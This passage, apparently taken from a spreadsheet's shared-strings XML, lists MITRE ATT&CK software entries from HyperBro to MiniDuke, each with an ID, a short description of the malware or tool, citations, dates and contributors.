    <t>9002 RAT, Aurora</t>
  </si>
  <si>
    <t>S0398</t>
  </si>
  <si>
    <t>HyperBro</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) is a custom in-memory backdoor used by [Threat Group-3390](https://attack.mitre.org/groups/G0027).(Citation: Unit42 Emissary Panda May 2019)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0398</t>
  </si>
  <si>
    <t>09 July 2019</t>
  </si>
  <si>
    <t>S0537</t>
  </si>
  <si>
    <t>HyperStack</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) is a RPC-based backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2018. [HyperStack](https://attack.mitre.org/software/S0537) has similarities to other backdoors used by [Turla](https://attack.mitre.org/groups/G0010) including [Carbon](https://attack.mitre.org/software/S0335).(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0537</t>
  </si>
  <si>
    <t>02 December 2020</t>
  </si>
  <si>
    <t>S0189</t>
  </si>
  <si>
    <t>ISMInjector</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) is a Trojan used to install another [OilRig](https://attack.mitre.org/groups/G0049) backdoor, ISMAgent. (Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0189</t>
  </si>
  <si>
    <t>31 March 2020</t>
  </si>
  <si>
    <t>S0483</t>
  </si>
  <si>
    <t>IcedID</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017.  [IcedID](https://attack.mitre.org/software/S0483)  has been downloaded by [Emotet](https://attack.mitre.org/software/S0367) in multiple campaigns.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0483</t>
  </si>
  <si>
    <t>14 August 2020</t>
  </si>
  <si>
    <t>S0434</t>
  </si>
  <si>
    <t>Imminent Monitor</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0434</t>
  </si>
  <si>
    <t>05 May 2020</t>
  </si>
  <si>
    <t>10 July 2020</t>
  </si>
  <si>
    <t>Jose Luis Sánchez Martinez</t>
  </si>
  <si>
    <t>S0357</t>
  </si>
  <si>
    <t>Impacket</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://attack.mitre.org/software/S0357) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0357</t>
  </si>
  <si>
    <t>Jacob Wilkin, Trustwave, SpiderLabs</t>
  </si>
  <si>
    <t>S0259</t>
  </si>
  <si>
    <t>InnaputRAT</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) is a remote access tool that can exfiltrate files from a victim’s machine. [InnaputRAT](https://attack.mitre.org/software/S0259) has been seen out in the wild since 2016. (Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0259</t>
  </si>
  <si>
    <t>S0260</t>
  </si>
  <si>
    <t>InvisiMole</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) is a modular spyware program that has been used by the InvisiMole Group since at least 2013. [InvisiMole](https://attack.mitre.org/software/S0260) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. [Gamaredon Group](https://attack.mitre.org/groups/G0047) infrastructure has been used to download and execute [InvisiMole](https://attack.mitre.org/software/S0260) against a small number of victims.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0260</t>
  </si>
  <si>
    <t>S0231</t>
  </si>
  <si>
    <t>Invoke-PSImage</t>
  </si>
  <si>
    <t>[Invoke-PSImage](https://attack.mitre.org/software/S0231) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. (Citation: GitHub Invoke-PSImage)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0231</t>
  </si>
  <si>
    <t>Christiaan Beek, @ChristiaanBeek</t>
  </si>
  <si>
    <t>S0581</t>
  </si>
  <si>
    <t>IronNetInjector</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) is a [Turla](https://attack.mitre.org/groups/G0010) toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including [ComRAT](https://attack.mitre.org/software/S0126).(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0581</t>
  </si>
  <si>
    <t>24 February 2021</t>
  </si>
  <si>
    <t>13 April 2021</t>
  </si>
  <si>
    <t>S0015</t>
  </si>
  <si>
    <t>Ixeshe</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) is a malware family that has been used since at least 2009 against targets in East Asia. (Citation: Moran 2013)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0015</t>
  </si>
  <si>
    <t>S0389</t>
  </si>
  <si>
    <t>JCry</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) is ransomware written in Go. It was identified as apart of the #OpJerusalem 2019 campaign.(Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0389</t>
  </si>
  <si>
    <t>18 June 2019</t>
  </si>
  <si>
    <t>S0044</t>
  </si>
  <si>
    <t>JHUHUGIT</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) is malware used by [APT28](https://attack.mitre.org/groups/G0007). It is based on Carberp source code and serves as reconnaissance malware. (Citation: Kaspersky Sofacy) (Citation: F-Secure Sofacy 2015) (Citation: ESET Sednit Part 1) (Citation: FireEye APT28 January 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0044</t>
  </si>
  <si>
    <t>GAMEFISH, JKEYSKW, Sednit, Seduploader, SofacyCarberp, Trojan.Sofacy</t>
  </si>
  <si>
    <t>S0201</t>
  </si>
  <si>
    <t>JPIN</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) is a custom-built backdoor family used by [PLATINUM](https://attack.mitre.org/groups/G0068). Evidence suggests developers of [JPIN](https://attack.mitre.org/software/S0201) and [Dipsind](https://attack.mitre.org/software/S0200) code bases were related in some way. (Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0201</t>
  </si>
  <si>
    <t>11 August 2020</t>
  </si>
  <si>
    <t>S0163</t>
  </si>
  <si>
    <t>Janicab</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) is an OS X trojan that relied on a valid developer ID and oblivious users to install it. (Citation: Janicab)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0163</t>
  </si>
  <si>
    <t>S0528</t>
  </si>
  <si>
    <t>Javali</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0528</t>
  </si>
  <si>
    <t>S0215</t>
  </si>
  <si>
    <t>KARAE</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) is a backdoor typically used by [APT37](https://attack.mitre.org/groups/G0067) as first-stage malware. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0215</t>
  </si>
  <si>
    <t>S0271</t>
  </si>
  <si>
    <t>KEYMARBLE</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) is a Trojan that has reportedly been used by the North Korean government. (Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0271</t>
  </si>
  <si>
    <t>S0526</t>
  </si>
  <si>
    <t>KGH_SPY</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) is a modular suite of tools used by [Kimsuky](https://attack.mitre.org/groups/G0094) for reconnaissance, information stealing, and backdoor capabilities. [KGH_SPY](https://attack.mitre.org/software/S0526) derived its name from PDB paths and internal names found in samples containing "KGH".(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0526</t>
  </si>
  <si>
    <t xml:space="preserve">KGH_SPY </t>
  </si>
  <si>
    <t>S0156</t>
  </si>
  <si>
    <t>KOMPROGO</t>
  </si>
  <si>
    <t>[KOMPROGO](https://attack.mitre.org/software/S0156) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050) that is capable of process, file, and registry management. (Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0156</t>
  </si>
  <si>
    <t>S0356</t>
  </si>
  <si>
    <t>KONNI</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) is a Windows remote administration too that has been seen in use since 2014 and evolved in its capabilities through at least 2017. [KONNI](https://attack.mitre.org/software/S0356) has been linked to several campaigns involving North Korean themes.(Citation: Talos Konni May 2017) [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family. There is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0356</t>
  </si>
  <si>
    <t>03 August 2020</t>
  </si>
  <si>
    <t>1.4</t>
  </si>
  <si>
    <t>Doron Karmi, @DoronKarmi</t>
  </si>
  <si>
    <t>S0088</t>
  </si>
  <si>
    <t>Kasidet</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) is a backdoor that has been dropped by using malicious VBA macros. (Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0088</t>
  </si>
  <si>
    <t>S0265</t>
  </si>
  <si>
    <t>Kazuar</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. (Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0265</t>
  </si>
  <si>
    <t>S0585</t>
  </si>
  <si>
    <t>Kerrdown</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) is a downloader used by [APT32](https://attack.mitre.org/groups/G0050) to install spyware from a server on the victim's network.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0585</t>
  </si>
  <si>
    <t>02 March 2021</t>
  </si>
  <si>
    <t>S0487</t>
  </si>
  <si>
    <t>Kessel</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) is an advanced version of OpenSSH which acts as a custom backdoor, mainly acting to steal credentials and function as a bot. [Kessel](https://attack.mitre.org/software/S0487) has been active since its C2 domain began resolving in August 2018.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0487</t>
  </si>
  <si>
    <t>S0387</t>
  </si>
  <si>
    <t>KeyBoy</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.(Citation: CitizenLab KeyBoy Nov 2016)(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0387</t>
  </si>
  <si>
    <t>14 June 2019</t>
  </si>
  <si>
    <t>Bart Parys</t>
  </si>
  <si>
    <t>S0276</t>
  </si>
  <si>
    <t>Keydnap</t>
  </si>
  <si>
    <t>This piece of malware steals the content of the user's keychain while maintaining a permanent backdoor  (Citation: OSX Keydnap malware).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0276</t>
  </si>
  <si>
    <t>OSX/Keydnap</t>
  </si>
  <si>
    <t>S0599</t>
  </si>
  <si>
    <t>Kinsing</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. (Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0599</t>
  </si>
  <si>
    <t>S0437</t>
  </si>
  <si>
    <t>Kivars</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by [BlackTech](https://attack.mitre.org/groups/G0098) in a 2010 campaign.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0437</t>
  </si>
  <si>
    <t>03 June 2020</t>
  </si>
  <si>
    <t>S0250</t>
  </si>
  <si>
    <t>Koadic</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool. [Koadic](https://attack.mitre.org/software/S0250) is publicly available on GitHub and the tool is executed via the command-line. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants. [Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host. (Citation: Github Koadic) (Citation: Palo Alto Sofacy 06-2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0250</t>
  </si>
  <si>
    <t>S0162</t>
  </si>
  <si>
    <t>Komplex</t>
  </si>
  <si>
    <t>[Komplex](https://attack.mitre.org/software/S0162) is a backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be developed in a similar manner to [XAgentOSX](https://attack.mitre.org/software/S0161) (Citation: XAgentOSX 2017) (Citation: Sofacy Komplex Trojan).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0162</t>
  </si>
  <si>
    <t>S0236</t>
  </si>
  <si>
    <t>Kwampirs</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) is a backdoor Trojan used by [Orangeworm](https://attack.mitre.org/groups/G0071). It has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines. (Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0236</t>
  </si>
  <si>
    <t>18 March 2020</t>
  </si>
  <si>
    <t>Elger Vinicius S. Rodrigues, @elgervinicius, CYBINT Centre</t>
  </si>
  <si>
    <t>S0042</t>
  </si>
  <si>
    <t>LOWBALL</t>
  </si>
  <si>
    <t>[LOWBALL](https://attack.mitre.org/software/S0042) is malware used by [admin@338](https://attack.mitre.org/groups/G0018). It was used in August 2015 in email messages targeting Hong Kong-based media organizations. (Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0042</t>
  </si>
  <si>
    <t>S0349</t>
  </si>
  <si>
    <t>LaZagne</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. [LaZagne](https://attack.mitre.org/software/S0349) is publicly available on GitHub.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0349</t>
  </si>
  <si>
    <t>23 November 2020</t>
  </si>
  <si>
    <t>S0395</t>
  </si>
  <si>
    <t>LightNeuron</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. [LightNeuron](https://attack.mitre.org/software/S0395) has been used by [Turla](https://attack.mitre.org/groups/G0010) to target diplomatic and foreign affairs-related organizations. The presence of certain strings in the malware suggests a Linux variant of [LightNeuron](https://attack.mitre.org/software/S0395) exists.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0395</t>
  </si>
  <si>
    <t>S0211</t>
  </si>
  <si>
    <t>Linfo</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) is a rootkit trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0211</t>
  </si>
  <si>
    <t>S0362</t>
  </si>
  <si>
    <t>Linux Rabbit</t>
  </si>
  <si>
    <t xml:space="preserve">[Linux Rabbit](https://attack.mitre.org/software/S0362) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.(Citation: Anomali Linux Rabbit 2018)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0362</t>
  </si>
  <si>
    <t>04 March 2019</t>
  </si>
  <si>
    <t>S0397</t>
  </si>
  <si>
    <t>LoJax</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) is a UEFI rootkit used by [APT28](https://attack.mitre.org/groups/G0007) to persist remote access software on targeted systems.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0397</t>
  </si>
  <si>
    <t>02 July 2019</t>
  </si>
  <si>
    <t>Jean-Ian Boutin, ESET</t>
  </si>
  <si>
    <t>S0372</t>
  </si>
  <si>
    <t>LockerGoga</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that has been tied to various attacks on European companies. It was first reported upon in January 2019.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0372</t>
  </si>
  <si>
    <t>16 April 2019</t>
  </si>
  <si>
    <t>S0447</t>
  </si>
  <si>
    <t>Lokibot</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) is a malware designed to collect credentials and security tokens from an infected machine. [Lokibot](https://attack.mitre.org/software/S0447) has also been used to establish backdoors in enterprise environments.(Citation: Infoblox Lokibot January 2019)(Citation: Morphisec Lokibot April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0447</t>
  </si>
  <si>
    <t>14 May 2020</t>
  </si>
  <si>
    <t>18 May 2020</t>
  </si>
  <si>
    <t>S0582</t>
  </si>
  <si>
    <t>LookBack</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using [LookBack](https://attack.mitre.org/software/S0582).(Citation: Proofpoint LookBack Malware Aug 2019)(Citation: Dragos TALONITE)(Citation: Dragos Threat Report 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0582</t>
  </si>
  <si>
    <t>S0451</t>
  </si>
  <si>
    <t>LoudMiner</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0451</t>
  </si>
  <si>
    <t>01 September 2020</t>
  </si>
  <si>
    <t>S0121</t>
  </si>
  <si>
    <t>Lslsass</t>
  </si>
  <si>
    <t>[Lslsass](https://attack.mitre.org/software/S0121) is a publicly-available tool that can dump active logon session password hashes from the lsass process. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0121</t>
  </si>
  <si>
    <t>S0532</t>
  </si>
  <si>
    <t>Lucifer</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0532</t>
  </si>
  <si>
    <t>16 November 2020</t>
  </si>
  <si>
    <t>S0010</t>
  </si>
  <si>
    <t>Lurid</t>
  </si>
  <si>
    <t>[Lurid](https://attack.mitre.org/software/S0010) is a malware family that has been used by several groups, including [PittyTiger](https://attack.mitre.org/groups/G0011), in targeted attacks as far back as 2006. (Citation: Villeneuve 2014) (Citation: Villeneuve 2011)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0010</t>
  </si>
  <si>
    <t>Enfal</t>
  </si>
  <si>
    <t>S0500</t>
  </si>
  <si>
    <t>MCMD</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) is a remote access tool that provides remote command shell capability used by [Dragonfly 2.0](https://attack.mitre.org/groups/G0074).(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0500</t>
  </si>
  <si>
    <t>13 August 2020</t>
  </si>
  <si>
    <t>20 August 2020</t>
  </si>
  <si>
    <t>S0443</t>
  </si>
  <si>
    <t>MESSAGETAP</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) is a data mining malware family deployed by [APT41](https://attack.mitre.org/groups/G0096) into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0443</t>
  </si>
  <si>
    <t>11 May 2020</t>
  </si>
  <si>
    <t>S0233</t>
  </si>
  <si>
    <t>MURKYTOP</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) is a reconnaissance tool used by [Leviathan](https://attack.mitre.org/groups/G0065). (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0233</t>
  </si>
  <si>
    <t>S0282</t>
  </si>
  <si>
    <t>MacSpy</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) is a malware-as-a-service offered on the darkweb  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0282</t>
  </si>
  <si>
    <t>S0409</t>
  </si>
  <si>
    <t>Machete</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) is a cyber espionage toolset used by [Machete](https://attack.mitre.org/groups/G0095). It is a Python-based backdoor targeting Windows machines that was first observed in 2010.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0409</t>
  </si>
  <si>
    <t>13 September 2019</t>
  </si>
  <si>
    <t>Pyark</t>
  </si>
  <si>
    <t>Matias Nicolas Porolli, ESET</t>
  </si>
  <si>
    <t>S0413</t>
  </si>
  <si>
    <t>MailSniper</t>
  </si>
  <si>
    <t>MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.(Citation: GitHub MailSniper)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0413</t>
  </si>
  <si>
    <t>05 October 2019</t>
  </si>
  <si>
    <t>Azure AD, Office 365, Windows</t>
  </si>
  <si>
    <t>S0167</t>
  </si>
  <si>
    <t>Matryoshka</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is a malware framework used by [CopyKittens](https://attack.mitre.org/groups/G0052) that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0167</t>
  </si>
  <si>
    <t>S0449</t>
  </si>
  <si>
    <t>Maze</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) ransomware, previously known as "ChaCha", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [Maze](https://attack.mitre.org/software/S0449) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.(Citation: FireEye Maze May 2020)(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0449</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); SarathKumar Rajendran, Trimble Inc</t>
  </si>
  <si>
    <t>S0459</t>
  </si>
  <si>
    <t>MechaFlounder</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) is a python-based remote access tool (RAT) that has been used by [APT39](https://attack.mitre.org/groups/G0087). The payload uses a combination of actor developed code and code snippets freely available online in development communities.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0459</t>
  </si>
  <si>
    <t>27 May 2020</t>
  </si>
  <si>
    <t>28 May 2020</t>
  </si>
  <si>
    <t>S0576</t>
  </si>
  <si>
    <t>MegaCortex</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) is ransomware that first appeared in May 2019. (Citation: IBM MegaCortex) [MegaCortex](https://attack.mitre.org/software/S0576) has mainly targeted industrial organizations. (Citation: FireEye Ransomware Disrupt Industrial Production)(Citation: FireEye Financial Actors Moving into OT)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0576</t>
  </si>
  <si>
    <t>S0530</t>
  </si>
  <si>
    <t>Melcoz</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) is a banking trojan family built from the open source tool Remote Access PC. [Melcoz](https://attack.mitre.org/software/S0530) was first observed in attacks in Brazil and since 2018 has spread to Chile, Mexico, Spain, and Portugal.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0530</t>
  </si>
  <si>
    <t>S0455</t>
  </si>
  <si>
    <t>Metamorfo</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) is a banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting mostly Brazilian users.(Citation: Medium Metamorfo Apr 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0455</t>
  </si>
  <si>
    <t>Chen Erlich, @chen_erlich, enSilo</t>
  </si>
  <si>
    <t>S0339</t>
  </si>
  <si>
    <t>Micropsia</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) is a remote access tool written in Delphi.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0339</t>
  </si>
  <si>
    <t>S0179</t>
  </si>
  <si>
    <t>MimiPenguin</t>
  </si>
  <si>
    <t>[MimiPenguin](https://attack.mitre.org/software/S0179) is a credential dumper, similar to [Mimikatz](https://attack.mitre.org/software/S0002), designed specifically for Linux platforms. (Citation: MimiPenguin GitHub May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0179</t>
  </si>
  <si>
    <t>Vincent Le Toux</t>
  </si>
  <si>
    <t>S0002</t>
  </si>
  <si>
    <t>Mimikatz</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. (Citation: Deply Mimikatz) (Citation: Adsecurity Mimikatz Guide)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0002</t>
  </si>
  <si>
    <t>S0133</t>
  </si>
  <si>
    <t>Miner-C</t>
  </si>
  <si>
    <t>[Miner-C](https://attack.mitre.org/software/S0133) is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. (Citation: Softpedia MinerC)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0133</t>
  </si>
  <si>
    <t>Mal/Miner-C, PhotoMiner</t>
  </si>
  <si>
    <t>S0051</t>
  </si>
  <si>
    <t>MiniDuke</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. The [MiniDuke](https://attack.mitre.org/software/S0051) toolset consists of multiple downloader and backdoor components. The loader has been used with other [MiniDuke](https://attack.mitre.org/software/S0051) components as well as in conjunction with [CosmicDuke](https://attack.mitre.org/software/S0050) and [PinchDuke](https://attack.mitre.org/software/S0048). (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0051</t>
  </si>
  <si>
    <t>23 September 2020</t>
  </si>
  <si>
